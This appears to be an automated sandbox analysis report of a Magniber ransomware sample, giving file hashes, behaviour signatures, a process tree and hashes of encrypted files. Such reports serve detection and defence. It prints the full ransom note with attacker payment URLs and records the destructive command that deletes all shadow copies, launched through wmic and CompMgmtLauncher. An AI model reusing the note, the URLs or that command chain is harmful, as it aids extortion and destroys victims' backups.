Overview

overview

10

Static

static

10.exe

windows7_x64

10

10.exe

windows10_x64

10

Analysis

  • max time kernel
    101s
  • max time network
    167s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    22-06-2021 14:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    10.exe

  • Size

    21KB

  • MD5

    89dec4d6bfe84c184bba66cb88e9e9b1

  • SHA1

    9ef17ae9e70f9ce851a2460028da272d4828e270

  • SHA256

    2852f76a016cf31d51a7d59a77857bee6285f59c95d6bcb8cd83b83640adbb69

  • SHA512

    37f057cf49cc6e2626e6a3881898cff4d1956bfe73770f7bf35c0e2afbcd04f772eed88ea997eda74c402986d7d234f58269efe695a4a25eddfe7ded8e98a4c0

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://22ecca08ea784a70d8ovlamrdt.5s4ixqul2enwxrqv.onion/ovlamrdt Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://22ecca08ea784a70d8ovlamrdt.dayhit.xyz/ovlamrdt http://22ecca08ea784a70d8ovlamrdt.bestep.cyou/ovlamrdt http://22ecca08ea784a70d8ovlamrdt.ownhits.space/ovlamrdt http://22ecca08ea784a70d8ovlamrdt.plughas.casa/ovlamrdt Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://22ecca08ea784a70d8ovlamrdt.5s4ixqul2enwxrqv.onion/ovlamrdt

http://22ecca08ea784a70d8ovlamrdt.dayhit.xyz/ovlamrdt

http://22ecca08ea784a70d8ovlamrdt.bestep.cyou/ovlamrdt

http://22ecca08ea784a70d8ovlamrdt.ownhits.space/ovlamrdt

http://22ecca08ea784a70d8ovlamrdt.plughas.casa/ovlamrdt

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 9 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Users\Admin\AppData\Local\Temp\10.exe
      "C:\Users\Admin\AppData\Local\Temp\10.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1020
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1788
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
            PID:1192
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1244
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            4⤵
              PID:1688
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1284
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2028
      • C:\Windows\system32\Dwm.exe
        "C:\Windows\system32\Dwm.exe"
        1⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1172
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1800
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1636
      • C:\Windows\system32\taskhost.exe
        "taskhost.exe"
        1⤵
        • Modifies extensions of user files
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1104
        • C:\Windows\system32\notepad.exe
          notepad.exe C:\Users\Public\readme.txt
          2⤵
          • Opens file in notepad (likely ransom note)
          PID:1272
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1060
        • C:\Windows\system32\cmd.exe
          cmd /c "start http://22ecca08ea784a70d8ovlamrdt.dayhit.xyz/ovlamrdt^&1^&46770499^&67^&327^&12"
          2⤵
            PID:1668
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" http://22ecca08ea784a70d8ovlamrdt.dayhit.xyz/ovlamrdt&1&46770499&67&327&12
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1900
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1900 CREDAT:275457 /prefetch:2
                4⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:2160
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:932
        • C:\Windows\system32\wbem\wmiprvse.exe
          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1668
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            2⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:1468
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2168
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                4⤵
                  PID:2472
            • C:\Windows\system32\cmd.exe
              cmd /c CompMgmtLauncher.exe
              2⤵
              • Process spawned unexpected child process
              • Suspicious use of WriteProcessMemory
              PID:516
              • C:\Windows\system32\CompMgmtLauncher.exe
                CompMgmtLauncher.exe
                3⤵
                  PID:2260
                  • C:\Windows\system32\wbem\wmic.exe
                    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                    4⤵
                      PID:2480
                • C:\Windows\system32\cmd.exe
                  cmd /c CompMgmtLauncher.exe
                  2⤵
                  • Process spawned unexpected child process
                  • Suspicious use of WriteProcessMemory
                  PID:2068
                  • C:\Windows\system32\CompMgmtLauncher.exe
                    CompMgmtLauncher.exe
                    3⤵
                      PID:2236
                      • C:\Windows\system32\wbem\wmic.exe
                        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                        4⤵
                          PID:2500
                    • C:\Windows\system32\cmd.exe
                      cmd /c CompMgmtLauncher.exe
                      2⤵
                      • Process spawned unexpected child process
                      • Suspicious use of WriteProcessMemory
                      PID:2060
                      • C:\Windows\system32\CompMgmtLauncher.exe
                        CompMgmtLauncher.exe
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2212
                        • C:\Windows\system32\wbem\wmic.exe
                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                          4⤵
                            PID:2464
                      • C:\Windows\system32\cmd.exe
                        cmd /c CompMgmtLauncher.exe
                        2⤵
                        • Process spawned unexpected child process
                        • Suspicious use of WriteProcessMemory
                        PID:2092
                        • C:\Windows\system32\CompMgmtLauncher.exe
                          CompMgmtLauncher.exe
                          3⤵
                            PID:2192
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          2⤵
                          • Process spawned unexpected child process
                          • Interacts with shadow copies
                          PID:2640
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          2⤵
                          • Process spawned unexpected child process
                          • Interacts with shadow copies
                          PID:2632
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          2⤵
                          • Process spawned unexpected child process
                          • Interacts with shadow copies
                          PID:2768
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          2⤵
                          • Process spawned unexpected child process
                          • Interacts with shadow copies
                          PID:2792
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                          PID:2760

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\0AEYPAEF.txt
                          MD5

                          f755a7ff673a8a279fdb90c9a90da0ac

                          SHA1

                          920e524e854927b03d16bd7dff89c170536a18bd

                          SHA256

                          5f312c39bd8c67f05904a41f0550c01f94f058e8ae017102493d49de1325a8b7

                          SHA512

                          5a7442023c1a5b03a9a7e4c0eb21c29ff533b1c7868fcd7754eec0d14fc42b31e32192424a2473d8efa155b7f10114922620b03ae7599b320c08bd37d765c668

                          Download Submit

                        • C:\Users\Admin\Desktop\ConvertHide.crw.ovlamrdt
                          MD5

                          15dbf3fe7ef72a626a9b462325887efc

                          SHA1

                          7e575e4d60057e7a349b1d34ba8c191ded22bdb5

                          SHA256

                          71dcb6556c5c8b9ebf7cf8450b2a2a4ee93f73641fb0ccbea980782cb205b437

                          SHA512

                          8125f7a619ef89314da3d19965ceadc027f46993cbb4a767f5bc555ef22807c1eb8cbb2dcbb2d309c001f61f2f7a6318dc66541016ab87f85e7c1a8b53fee219

                          Download Submit

                        • C:\Users\Admin\Desktop\ConvertToLimit.xlt.ovlamrdt
                          MD5

                          3a32ce326b4c56d5b805000bf67d8330

                          SHA1

                          01b6d7727cdfd5c06045493e8e5c46177712fbfa

                          SHA256

                          69ccc5b24f817616cdb3e7ad7fd22d1ee8f9fcb09494adb602beaa266d516cb2

                          SHA512

                          8289f89b722d7f7adaa9573a5700731f7266025726248169b755e1a93c2b3cdee16864e3c69a0623bcaa809809b17fef0f71ba63af1ac2f50b7ec65319a080d0

                          Download Submit

                        • C:\Users\Admin\Desktop\MeasureLimit.vb.ovlamrdt
                          MD5

                          dc53f77f6df9efb4bc2aef68b6dd4f47

                          SHA1

                          db874ce487a01b415b86f6991ca65f788a3c5489

                          SHA256

                          d78fc16c57e21805ae839f70191a1ac3e07c59e742b55e26497cf5c66773fcba

                          SHA512

                          204c42d9d851b7e41202cdc1bcc7796af67958aebd78987c224f8fd786b86b009dbcde892c0aed3e2382593a62cea79738e1a5355feafecd47f73ec3e63a80b2

                          Download Submit

                        • C:\Users\Admin\Desktop\MoveHide.wav.ovlamrdt
                          MD5

                          ff2a81ae4b1057971e9ec87bd3e8ce68

                          SHA1

                          85eeb077ec437f842d1aa257daef719b7a4eddb4

                          SHA256

                          969336bff439a1518e9d0e6800812c637f32cb1f46d260bd0286f2c3eb19854d

                          SHA512

                          7be02484daf7f5db027108aeae80ba0311db91784d1c2a4d1624f7d6fe4542b596b48c488f3339741dac2f4773a713ad0a029e5ca9dcbfc337d1f2b79e7dbd27

                          Download Submit

                        • C:\Users\Admin\Desktop\NewHide.png.ovlamrdt
                          MD5

                          70f8d0deae2ae658b4f73de3be6078bb

                          SHA1

                          95ad95baade5bd24eb2e994b8915bb5b8f908df1

                          SHA256

                          f5fbb0391bf4667225939c83caf463c465027bcbbbc58ec2e4b810714fab8769

                          SHA512

                          fbac844724bf9b6d9bb2d2cc769e5b8ced6d184211e7e9c0c42c47e412e13092cd80f71454d4d5115af880149dd4a5e74f5ce52a11eae699c03294d22cfab533

                          Download Submit

                        • C:\Users\Admin\Desktop\StartComplete.asp.ovlamrdt
                          MD5

                          7cc8e8f4bbea483a97d459cc0ac2a5d1

                          SHA1

                          50825314ab2cd26aaf57b30b3a1384530fa52a45

                          SHA256

                          07205dc289a85654181e1c2b0c3230c3a2dd802864c31943adcf57319c9401b0

                          SHA512

                          48445f323944a3298ae2a43a01b750734fe788ca54775cd7ac69a22bcd555f336782f3c68afbede1d79d0d59a0e4b372ed08181ccccf883485fee520fafbbb1a

                          Download Submit

                        • C:\Users\Admin\Desktop\WritePop.ods.ovlamrdt
                          MD5

                          ccd7d7f0da7f4f6dcf7155408383f8ca

                          SHA1

                          4baa04b71cbbab2a69e378c8b2165fb3c27df9ed

                          SHA256

                          bb1033df7604c8f60711c817c38c26d7aacb7911926ea2fce8228a125943604d

                          SHA512

                          6bfc62bc17e7337f85b1a26ee32b7adb0f9e0bebb46f3d48fdb247c62403b8850a78a79a439efebc2af1709d2109e1ff3086c39cf6a1631538aa3384d632a8e0

                          Download Submit

                        • C:\Users\Admin\Desktop\readme.txt
                          MD5

                          e7e729288a0927ce48bac40f5db3ce50

                          SHA1

                          2676dded61de2d4566c0ee738c380ed6bd72f198

                          SHA256

                          d3193a67a1a5f2f959cdb3017ea54efebac9b855825bc5795d79d60298123186

                          SHA512

                          fe94fafec66311f440333af1542434f1fd0a080b6bd3c97ee5aa8243ed435cdda8da89f3f2f6189f3f8c5e125ed37676db8e7a270beae3639625faa1ae0507ff

                          Download Submit

                        • C:\Users\Public\readme.txt
                          MD5

                          e7e729288a0927ce48bac40f5db3ce50

                          SHA1

                          2676dded61de2d4566c0ee738c380ed6bd72f198

                          SHA256

                          d3193a67a1a5f2f959cdb3017ea54efebac9b855825bc5795d79d60298123186

                          SHA512

                          fe94fafec66311f440333af1542434f1fd0a080b6bd3c97ee5aa8243ed435cdda8da89f3f2f6189f3f8c5e125ed37676db8e7a270beae3639625faa1ae0507ff

                          Download Submit

                        • memory/932-136-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1020-92-0x0000000001D20000-0x0000000001D21000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1020-61-0x00000000000F0000-0x00000000000F1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1020-88-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1020-90-0x0000000001D00000-0x0000000001D01000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1020-91-0x0000000001D10000-0x0000000001D11000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1020-93-0x0000000001D30000-0x0000000001D31000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1020-59-0x0000000000020000-0x0000000000025000-memory.dmp

                          Filesize

                          20KB

                          Download

                        • memory/1020-87-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1020-60-0x00000000000E0000-0x00000000000E1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1020-86-0x0000000000490000-0x0000000000491000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1020-62-0x0000000000100000-0x0000000000101000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1020-63-0x0000000000110000-0x0000000000111000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1060-133-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1104-95-0x00000000001D0000-0x00000000001D4000-memory.dmp

                          Filesize

                          16KB

                          Download

                        • memory/1192-145-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1244-146-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1272-124-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/1272-123-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1284-142-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1636-139-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1668-132-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1688-147-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1788-144-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1800-138-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1900-140-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2028-143-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2160-149-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2168-148-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2192-150-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2212-151-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2236-152-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2260-154-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2464-160-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2472-159-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2480-161-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2500-162-0x0000000000000000-mapping.dmp

                          Download